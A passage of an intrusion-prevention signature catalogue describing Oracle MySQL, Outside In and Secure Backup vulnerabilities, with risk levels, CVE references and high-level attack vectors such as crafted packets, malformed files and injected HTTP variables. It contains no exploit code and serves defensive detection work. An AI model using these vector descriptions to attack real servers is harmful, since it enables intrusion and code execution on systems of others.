Description: A stack based buffer overflow vulnerability in Oracle MySQL Cluster, versions 7.4.34 and prior, 7.5.24 and prior, 7.6.20 and prior, 8.0.27 and prior, which allows remote attackers to execute arbitrary code by sending a crafted packet to the target server, due to a malfunction in the MySQL NDB Cluster component.
Situation: Generic_CS-Oracle-MySQL-Cluster-Management-API-dumpState-Stack-Buffer-Overflow
References:
CVE-2022-21280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21280
Back to top

Oracle-MySQL-Cluster-Management-API-Report_Event-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL Cluster
Risk: Moderate
First detected in: sgpkg-ips-1452-5242
Last changed: sgpkg-ips-1452-5242
Platform: Generic
Software: MySQL
Type: Buffer Overflow
Description: Improper parsing of command parameters in the MySQL NDB Cluster component causes a stack buffer overflow which can be exploited to execute arbitrary code on the target system with the privileges of the database.
Situation: Generic_CS-Oracle-MySQL-Cluster-Management-API-Report_Event-Stack-Buffer-Overflow
References:
CVE-2022-21279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21279
Back to top

Oracle-MySQL-Cluster-Management-API-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL Cluster
Risk: Moderate
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Platform: Generic
Software: MySQL
Type: Buffer Overflow
Description: Improper validation of cluster api messages causes a stack buffer overflow in MySQL. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Oracle-MySQL-Cluster-Management-API-Stack-Buffer-Overflow
References:
CVE-2021-35590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35590
Back to top

Oracle-MySQL-Database-Com_Field_Fist-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Buffer Overflow
Description: A security bypass vulnerability has been reported in MySQL database server. The vulnerability is due to an error while parsing a table name argument of a COM_FIELD_LIST command packet. Remote authenticated attacker can exploit this vulnerability by sending malicious COM_FIELD_LIST command packet. In an attack scenario where code execution is successful the injected code will be executed within the security context of the service. An unsuccessful exploitation would cause the database service to terminate abnormally.
Situation: MySQL_Oracle-MySQL-Database-Com_Field_Fist-Buffer-Overflow
References:
CVE-2010-1850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1850
BID-40106
http://www.securityfocus.com/bid/40106
Back to top

Oracle-Mysql-Database-In-And-Case-Null-Argument-Denial-Of-Service

About this vulnerability: A vulnerability in Oracle MySQL
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Malfunction
Description: A Denial of Service vulnerability exists in Oracle MySQL database server. The vulnerability is due to an error while handling IN or CASE functions when NULL arguments are passed to the functions either by the WITH ROLLUP modifier or explicitly. Remote authenticated attackers can exploit this vulnerability by sending malicious command packets to the server. Successful exploitation would cause the target server to terminate, denying service to all users until the server is restarted.
Situation: MySQL_Oracle-Mysql-Database-In-And-Case-Null-Argument-Denial-Of-Service
Back to top

Oracle-MySQL-Database-Unique-SET-Column-Join-Denial-of-Service

About this vulnerability: This is the published proof of concept attack against MySQL using joins involving an unique SET column.
Risk: Moderate
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: MySQL
Type: Malfunction
Description: This fingerprint detects the published proof of concept recording using joins involving an unique SET column.
Situation: MySQL_Oracle-MySQL-Database-Unique-SET-Column-Join-Denial-of-Service
Back to top

Oracle-MySQL-Delete-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL
Risk: High
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in MySQL database server. The vulnerability is due to an error while parsing the DELETE command. A remote authenticated attacker can exploit this vulnerability by sending a malicious DELETE command to the affected service. In an attack scenario where code execution is successful, the injected code will be executed within the security context of the service. An unsuccessful exploitation attempt would cause the database service to terminate abnormally.
Situation: MySQL_CS-Oracle-MySQL-Delete-Heap-Buffer-Overflow
References:
CVE-2012-5612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5612
BID-56768
http://www.securityfocus.com/bid/56768
OSVDB-88064
http://www.osvdb.org/88064
Back to top

Oracle-MySQL-Drop-Table

About this vulnerability: Drop Table command
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: SQL Injection
Description: A DROP TABLE command was detected
Situation: MySQL_Oracle-MySQL-Drop-Table
Back to top

Oracle-MySQL-Grant-Command-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL
Risk: High
First detected in: sgpkg-ips-496-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in MySQL database server. The vulnerability is due to an error while parsing a priv_level argument of a GRANT command. Remote authenticated attackers can exploit this vulnerability by sending a malicious GRANT command to the affected service. In an attack scenario where code execution is successful, the injected code will be executed within the security context of the service. An unsuccessful exploitation attempt would cause the database service to terminate abnormally.
Situation: MySQL_CS-Oracle-MySQL-Grant-Command-Stack-Buffer-Overflow
References:
CVE-2012-5611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611
OSVDB-88066
http://www.osvdb.org/88066
Back to top

Oracle-MySQL-Payload-Execution

About this vulnerability: An attempt to exploit a vulnerability in Oracle MySQL detected
Risk: High
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MySQL
Type: Malfunction
Description: Vulnerable version of MySQL for Windows allow writing arbitrary binary code to .dll files with system permissions, and subsequent execution.
Situation: MySQL_Oracle-MySQL-Sys-Exec
MySQL_Oracle-MySQL-Dumpfile-DLL-Upload
Back to top

Oracle-Mysql-Server-Geometry-Query-Denial-Of-Service

About this vulnerability: A vulnerability in Oracle MySQL
Risk: High
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Malfunction
Description: A denial-of-service vulnerability has been reported in MySQL database server. The vulnerability is due to an error while parsing geometry queries. Remote authenticated attackers can exploit this vulnerability by sending malicious commands to the affected service. Successful exploitation would cause the database service to terminate abnormally.
Situation: MySQL_CS-Oracle-Mysql-Server-Geometry-Query-Denial-Of-Service
References:
CVE-2013-1861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1861
BID-58511
http://www.securityfocus.com/bid/58511
OSVDB-91415
http://www.osvdb.org/91415
Back to top

Oracle-Mysql-Server-Geometry-Query-Heap-Integer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL
Risk: High
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Integer Overflow
Description: A heap buffer overflow vulnerability exists in MySQL database server. The vulnerability is due to an error while parsing geometry queries. Remote authenticated attackers can exploit this vulnerability by sending malicious commands to the affected service. A successful exploitation can lead to arbitrary code execution in the context of the affected service, which is SYSTEM on Windows systems.
Situation: MySQL_CS-Oracle-Mysql-Server-Geometry-Query-Heap-Integer-Overflow
References:
CVE-2013-1861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1861
BID-58511
http://www.securityfocus.com/bid/58511
OSVDB-91415
http://www.osvdb.org/91415
Back to top

Oracle-MySQL-Server-Innodb-Memcached-Plugin-Get-Request-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL
Risk: Moderate
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1427-5242
Platform: Generic
Software: MySQL
Type: Buffer Overflow
Description: Improper input handling in the InnoDB memcached plugin component causes a buffer overflow vulnerability which can be exploited to allow an attacker to run arbitrary code on the target system.
Situation: Generic_CS-Oracle-MySQL-Server-Innodb-Memcached-Plugin-Get-Request-Buffer-Overflow
References:
CVE-2021-2429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2429
Back to top

Oracle-Mysql-Server-Innodb-Memcached-Plugin-Resource-Exhaustion

About this vulnerability: A vulnerability in Oracle MySQL
Risk: Moderate
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Resource Starvation
Description: A memory exhaustion vulnerability has been reported in the InnoDB memcached plugin component of Oracle MySQL Server. This vulnerability is due to incorrect freeing of allocated memory when processing certain type of requests. A remote unauthenticated attacker can exploit this vulnerability by sending large numbers of a certain type of command to the memcached plugin of MySQL server. Successful exploitation would result in the service's inability to allocate memory. This can result in a termination of the vulnerable program denying service to legitimate users.
Situation: Analyzer_MySQL-InnoDB-Memcached-Plugin-Resource-Exhaustion
Generic_CS-Memcached-Suspicious-Bind-Command
References:
CVE-2013-1570
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1570
OSVDB-92468
http://www.osvdb.org/92468
Back to top

Oracle-MySQL-Server-Innodb-Memcached-Plugin-SASL_Auth-Integer-Underflow

About this vulnerability: A vulnerability in Oracle MySQL
Risk: Moderate
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1424-5242
Platform: Generic
Software: MySQL
Type: Integer Overflow
Description: An integer underflow vulnerability in the InnoDB memcached plugin component of Oracle MySQL can be exploited to allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Oracle-MySQL-Server-Innodb-Memcached-Plugin-SASL_Auth-Integer-Underflow
References:
CVE-2021-2390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2390
Back to top

Oracle-Mysql-Server-Xpath-Denial-Of-Service

About this vulnerability: A vulnerability in Oracle MySQL
Risk: Moderate
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Malfunction
Description: A memory-corruption vulnerability has been reported in the Oracle MySQL Server. This vulnerability is due to an error in the XPath component when processing queries containing XML function calls. A remote, authenticated attacker can exploit this vulnerability by sending a malicious SQL request to target server. Successful exploitation would result in a memory corruption on the server. This can result in a termination of the vulnerable program denying service to legitimate users.
Situation: MySQL_CS-Oracle-Mysql-Server-Xpath-Denial-Of-Service
References:
CVE-2014-0384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0384
OSVDB-105911
http://www.osvdb.org/105911
Back to top

Oracle-Opera-Remote-Code-Execution-CVE-2023-21932

About this vulnerability: A vulnerability in Oracle Opera
Risk: High
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1582-5242
Platform: Generic
Software: Oracle Opera
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Oracle Hospitality OPERA 5 Property Services.
Situation: HTTP_CSU-Oracle-Opera-Remote-Code-Execution-CVE-2023-21932
References:
CVE-2023-21932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21932
Back to top

Oracle-Oss-Support-Tools-Diagnostic-Assistant-External-Entity-Injection

About this vulnerability: A vulnerability in Oracle OSS Support Tools
Risk: Moderate
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: Oracle OSS Support Tools
Type: Input Validation
Description: Improper parsing of input parameters causes an external entity injection vulnerability in Oracle OSS Support Tools. A successful exploit allows an attacker to gain access to arbitrary files accessible to the target application.
Situation: HTTP_CSU-Oracle-Oss-Support-Tools-Diagnostic-Assistant-External-Entity-Injection
References:
CVE-2021-2303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2303
Back to top

Oracle-Outside-In-Coreldraw-File-Parser-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing CorelDRAW files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable libraries to handle a malformed files. Depending on the application, user interaction may be required. Successful exploitation can result in execution of arbitrary code or a denial of service condition in the context of the affected application.
Situation: File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Heap-Buffer-Overflow
References:
CVE-2013-0418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0418
BID-57364
http://www.securityfocus.com/bid/57364
MS13-012
http://technet.microsoft.com/security/bulletin/MS13-012
Back to top

Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Buffer Overflow
Description: Ther is an integer overflow vulnerability that leads to a heap buffer overflow in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability occurs when handling CorelDRAW (.cdr) files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed .cdr file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.
Situation: File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow
References:
CVE-2011-2264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2264
OSVDB-73912
http://www.osvdb.org/73912
Back to top

Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow-2

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology; Avantstar Quick View Plus
Type: Buffer Overflow
Description: There is an integer overflow vulnerability that leads to a heap buffer overflow in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability can be exploited by using crafted CorelDRAW (.cdr) files. Oracle Outside-In is used by many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to process a malformed .cdr file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.
Situation: File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow-2
References:
CVE-2011-3541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3541
BID-50207
http://www.securityfocus.com/bid/50207
Back to top

Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability exists when handling CorelDRAW (.cdr) files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed .cdr file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.
Situation: HTTP_SS-Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow
File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow
References:
CVE-2011-2264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2264
OSVDB-73912
http://www.osvdb.org/73912
Back to top

Oracle-Outside-In-Excel-Gelframe-Officeartreclen-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-1118-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Input Validation
Description: Improper handling of records in an OLE file causes an out of bounds read vulnerability in Oracle Outside In. A successful exploit can be used to gain information about the target system which can be used for further exploitation.
Situation: File-OLE_Oracle-Outside-In-Excel-Gelframe-Officeartreclen-Out-Of-Bounds-Read
References:
CVE-2018-3147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3147
Back to top

Oracle-Outside-In-Excel-Gelframe-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Integer Overflow
Description: Improper handling of a GelFrame record of an Excel document causes an out of bounds read vulnerability in the Oracle Outside-In library. A successful exploit may allow an attacker to leak data from the target system.
Situation: File-OLE_Oracle-Outside-In-Excel-Gelframe-Out-Of-Bounds-Read
References:
CVE-2018-2992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2992
Back to top

Oracle-Outside-In-Excel-Propertysetstream-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Malfunction
Description: Improper parsing of file contents causes an out of bounds write vulnerability in the Orace Outside in library. A successful exploit may allow an attacker to run code on the target system.
Situation: File-OLE_Oracle-Outside-In-Excel-Propertysetstream-Out-Of-Bounds-Write
References:
CVE-2018-3010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3010
Back to top

Oracle-Outside-In-JPEG-2000-Cod-And-Coc-Parameter-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Oracle Outside In, a set of libraries used to decode many file formats. The vulnerability is exposed when the product is used to handle JPEG 2000 files. Oracle Outside In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed JPEG 2000 file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.
Situation: File-JPEG_Oracle-Outside-In-JPEG-2000-Cod-And-Coc-Parameter-Heap-Buffer-Overflow
References:
CVE-2011-4516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4516
BID-50992
http://www.securityfocus.com/bid/50992
OSVDB-77595
http://www.osvdb.org/77595
Back to top

Oracle-Outside-In-JPEG-2000-Qcd-Segment-Processing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: High
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability exists when handling the QCD segments in JPEG 2000 files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed JPEG 2000 file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.
Situation: File-JPEG_Oracle-Outside-In-JPEG-2000-Qcd-Segment-Processing-Heap-BOF
References:
CVE-2012-1769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1769
BID-54500
http://www.securityfocus.com/bid/54500
MS12-067
http://technet.microsoft.com/security/bulletin/MS12-067
Back to top

Oracle-Outside-In-Lotus-1-2-3-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology; Avantstar Quick View Plus
Type: Buffer Overflow
Description: There is a code execution vulnerability in Oracle's Outside In SDK. The vulnerability is due to improper parsing of SRANGE records (type 0x001B) in Lotus 1-2-3 files. A remote, unauthenticated attacker can leverage this vulnerability by delivering a crafted Lotus 1-2-3 file to a vulnerable target. A successful attack could result in the execution of arbitrary code in the security context of the affected application.
Situation: File-Binary_Oracle-Outside-In-Lotus-1-2-3-Heap-Buffer-Overflow
References:
CVE-2012-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0110
BID-51452
http://www.securityfocus.com/bid/51452
OSVDB-78411
http://www.osvdb.org/78411
Back to top

Oracle-Outside-In-OS2-Metafile-Parser-Denial-Of-Service

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Infinite Loop
Description: There is a denial of service vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing OS/2 Metafiles. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable libraries to handle a malformed file. Depending on the application, user interaction may be required. Successful exploitation can result in a denial of service condition of the affected application.
Situation: File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Denial-Of-Service
Back to top

Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to a boundary error while processing OS/2 Metafiles. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable libraries to handle a malformed files. Depending on the application, user interaction may be required. Successful exploitation can result in execution of arbitrary code or a denial of service condition in the context of the affected application.
Situation: File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow
References:
CVE-2013-5763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5763
OSVDB-98894
http://www.osvdb.org/98894
MS13-105
http://technet.microsoft.com/security/bulletin/MS13-105
Back to top

Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow-2

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing OS/2 Metafiles. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable libraries to handle a malformed file. Depending on the application, user interaction may be required. Successful exploitation can result in execution of arbitrary code or a denial of service condition in the context of the affected application.
Situation: File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow-2
References:
CVE-2013-5879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5879
BID-64825
http://www.securityfocus.com/bid/64825
OSVDB-102030
http://www.osvdb.org/102030
Back to top

Oracle-Outside-In-OS22-Metafile-Parser-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing OS/2 Metafiles. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed file. Depending on the application, user interaction may be required. Successful exploitation can result in execution of arbitrary code or a denial of service condition in the context of the affected application.
Situation: File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Heap-Buffer-Overflow
Back to top

Oracle-Outside-In-Paradox-Database-Stream-Filter-Denial-Of-Service

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Input Validation
Description: There is a denial of service vulnerability in Oracle Outside In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing Paradox databases that contain a malicious entry in a field description array. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed Paradox database. Depending on the application, user interaction may be required. Successful exploitation can result in a denial of service condition in the context of the affected application.
Situation: File-Binary_Oracle-Outside-In-Paradox-Database-Stream-Filter-Denial-Of-Service
References:
CVE-2013-0393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0393
BID-57357
http://www.securityfocus.com/bid/57357
OSVDB-89193
http://www.osvdb.org/89193
MS13-012
http://technet.microsoft.com/security/bulletin/MS13-012
Back to top

Oracle-Outside-In-XPM-Image-Processing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: Moderate
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability exists when handling XPM image files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed XPM file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.
Situation: File-TextId_Oracle-Outside-In-XPM-Image-Processing-Stack-Buffer-Overflow
Back to top

Oracle-Reports-Service-File-Overwrite

About this vulnerability: File overwrite vulnerability in the Oracle Reports Service
Risk: High
First detected in: sgpkg-ips-55-1210
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Oracle Application Server; Oracle Developer Suite
Type: Input Validation
Description: The Oracle Reports Service component in Oracle Application Server has a file overwrite vulnerability. The application fails to validate the value of the 'desname' CGI parameter which can be used to configure where the generated report is stored. A remote attacker is able to exploit this vulnerability to overwrite arbitrary files on the target server.
Situation: HTTP_CSU-Oracle-Reports-Service-File-Overwrite
References:
CVE-2005-2371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2371
BID-14309
http://www.securityfocus.com/bid/14309
Back to top

Oracle-Secure-Backup-Administration-Other-Variable-Command-Injection

About this vulnerability: Command injection vulnerability in Oracle Secure Backup server
Risk: High
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle Secure Backup
Type: Code Injection
Description: There is a command injection vulnerability in Oracle Secure Backup server. The vulnerability is due to an input validation error in property_box.php. A remote authenticated attacker can compromise the vulnerable system by sending a crafted HTTP request to the affected script.
Situation: HTTP_CRL-Oracle-Secure-Backup-Administration-Other-Variable-Command-Injection
References:
CVE-2010-0899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0899
BID-41616
http://www.securityfocus.com/bid/41616
OSVDB-66333
http://www.osvdb.org/66333
Back to top

Oracle-Secure-Backup-Administration-Preauth-Variable-Command-Injection

About this vulnerability: A vulnerability in Oracle Secure Backup
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Input Validation
Description: A command execution vulnerability exists in Oracle Secure Backup server. The vulnerability is due to insufficient filtering when handling the $preauth variable. A remote authenticated attacker could exploit this vulnerability by sending a specially crafted HTTP request to the index.php script on the target server. Successful exploitation of this vulnerability may allow a remote authenticated attacker to execute arbitrary commands under the credentials of the SYSTEM account.
Situation: HTTP_CSU-Oracle-Secure-Backup-Administration-Preauth-Variable-Command-Injection
References:
CVE-2010-0906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0906
BID-41597
http://www.securityfocus.com/bid/41597
Back to top

Oracle-Secure-Backup-Administration-selector-Variable-Command-Injection

About this vulnerability: A command execution vulnerability in Oracle Secure Backup server
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Oracle Secure Backup
Type: Malfunction
Description: There is a command execution vulnerability in Oracle Secure Backup server. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server to execute arbitrary commands with SYSTEM privileges.
Situation: HTTP_CRL-Oracle-Secure-Backup-Administration-selector-Variable-Command-Injection
References:
CVE-2010-0906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0906
BID-41597
http://www.securityfocus.com/bid/41597
OSVDB-67128
http://www.osvdb.org/67128
Back to top

Oracle-Secure-Backup-Administration-Server-Authentication-Bypass

About this vulnerability: An authentication bypass vulnerability in Oracle Secure Backup server
Risk: Moderate
First detected in: sgpkg-ips-325-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Oracle Secure Backup
Type: Malfunction
Description: There is an authentication bypass vulnerability in Oracle Secure Backup server. By sending a crafted uname variable to the login.php script, a remote attacker can bypass authentication and log in to the vulnerable system with the full administrative capabilities.
Situation: HTTP_CRL-Oracle-Secure-Backup-Administration-Server-Authentication-Bypass
References:
CVE-2010-0904
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0904
BID-41596
http://www.securityfocus.com/bid/41596
Back to top

Oracle-Secure-Backup-Administration-Server-Command-Injection

About this vulnerability: Command injection vulnerability in Oracle Secure Backup server
Risk: High
First detected in: sgpkg-ips-240-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Oracle Secure Backup
Type: Code Injection
Description: A command injection vulnerability exists in Oracle Secure Backup server. The vulnerability is due to an input validation error in property_box.php. A remote attacker with limited user privileges can compromise the vulnerable system by sending a crafted HTTP request to the affected script.
Situation: HTTP_CRL-Oracle-Secure-Backup-Administration-Server-Command-Injection
HTTPS_CS-Oracle-Secure-Backup-Administration-Server-Command-Injection
References:
CVE-2009-1978
